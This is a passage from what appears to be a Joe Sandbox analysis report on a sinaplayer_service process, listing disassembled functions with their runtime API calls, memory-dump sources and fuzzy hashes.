                                                                                                                                                                                                    • Opcode Fuzzy Hash: 95c7af6e80a85ac1cfb7b3e225bc1806705d26c10d06824755486714f7a10b1c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 980119B5707665CFCB00DF6AD894A9A37B4EB8A318F004416E808CBB10D734D845CFAA
                                                                                                                                                                                                    Function 0038F230 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetOverlappedResult.KERNEL32(?,?,00000000,00000000), ref: 0038F24B
                                                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 0038F271
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EventOverlappedResult
                                                                                                                                                                                                    • String ID: ,
                                                                                                                                                                                                    • API String ID: 1635899351-3772416878
                                                                                                                                                                                                    • Opcode ID: deb6dd881dccac1721aa0627334ab903b8caa55cb2040a47111db20081d07e9a
                                                                                                                                                                                                    • Instruction ID: 81301a890fa21c59e738e7f137e21d90eac5811368abfcbd010f16e49a073288
                                                                                                                                                                                                    • Opcode Fuzzy Hash: deb6dd881dccac1721aa0627334ab903b8caa55cb2040a47111db20081d07e9a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3F08274504B04EFEB32EFA0DC49B96B7ECFB04304F0005AEE54682560DBB5A955DB90
                                                                                                                                                                                                    Function 00398068 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 003980BB: memset.MSVCR120 ref: 003980C8
                                                                                                                                                                                                      • Part of subcall function 00379E80: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,00398097,?,?,?,00371064), ref: 00379E83
                                                                                                                                                                                                      • Part of subcall function 00379E80: GetLastError.KERNEL32(?,?,?,00371064), ref: 00379E8D
                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,00371064), ref: 0039809B
                                                                                                                                                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00371064), ref: 003980AA
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 003980A5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CountCriticalDebugDebuggerErrorInitializeLastOutputPresentSectionSpinStringmemset
                                                                                                                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                    • API String ID: 1128651283-631824599
                                                                                                                                                                                                    • Opcode ID: 7d742cdb8df966c0ba56fba8733efc4e3213993835211ee0f16f0ac3330a6d1b
                                                                                                                                                                                                    • Instruction ID: 40556a206c6808935a3418faefee3dc37dec19d4e8bc693b7f1675337f5de7ee
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d742cdb8df966c0ba56fba8733efc4e3213993835211ee0f16f0ac3330a6d1b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E1E065702007118BD7329F69D4057427BE4AB42344F00891DE446C6750DB75D509CBA2
                                                                                                                                                                                                    Function 6C564B60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _unlock.MSVCR120(?), ref: 6C564B8E
                                                                                                                                                                                                      • Part of subcall function 6C55EDFC: LeaveCriticalSection.KERNEL32(?,6C561CC7,0000000D,6C561C60), ref: 6C55EE09
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 6C5A51E2
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalLeaveSection$_unlock
                                                                                                                                                                                                    • String ID: `bl
                                                                                                                                                                                                    • API String ID: 203654640-2297096494
                                                                                                                                                                                                    • Opcode ID: 5528755850ea22f2d1c05b4b6d3ab18931e78b445beebb3b513d2bf22fe0eadc
                                                                                                                                                                                                    • Instruction ID: a07ed0ad465dc9b2963638867d699158cd243a0228c05a98a939d5394e650f9c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5528755850ea22f2d1c05b4b6d3ab18931e78b445beebb3b513d2bf22fe0eadc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8BD02B7361570947CB240EFADC4AE6C736CD6042333504E25E84DC6ED1DA29E45149A9
                                                                                                                                                                                                    Function 00385390 Relevance: 5.1, APIs: 4, Instructions: 140COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • malloc.MSVCR120 ref: 003854A9
                                                                                                                                                                                                    • free.MSVCR120 ref: 00385517
                                                                                                                                                                                                    • free.MSVCR120 ref: 0038551D
                                                                                                                                                                                                    • memcpy.MSVCR120(00000000,?,00010110,?,?,?,?,?,?,?,?,?,?,?,?,00385D03), ref: 00385542
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$mallocmemcpy
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3401966785-0
                                                                                                                                                                                                    • Opcode ID: a4974c9052ad5816ebe493b03074a74716fa4465ee29a699c4109c0110ffb877
                                                                                                                                                                                                    • Instruction ID: 8737696e4c90d8e9717f0e3cede62ee735dbc064ea63b6b28e9e9ec3511f8215
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4974c9052ad5816ebe493b03074a74716fa4465ee29a699c4109c0110ffb877
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00516172E0061D9BCF22EF64DC42BDE77B8AF49300F0141E5E549A7241EAB596C48B91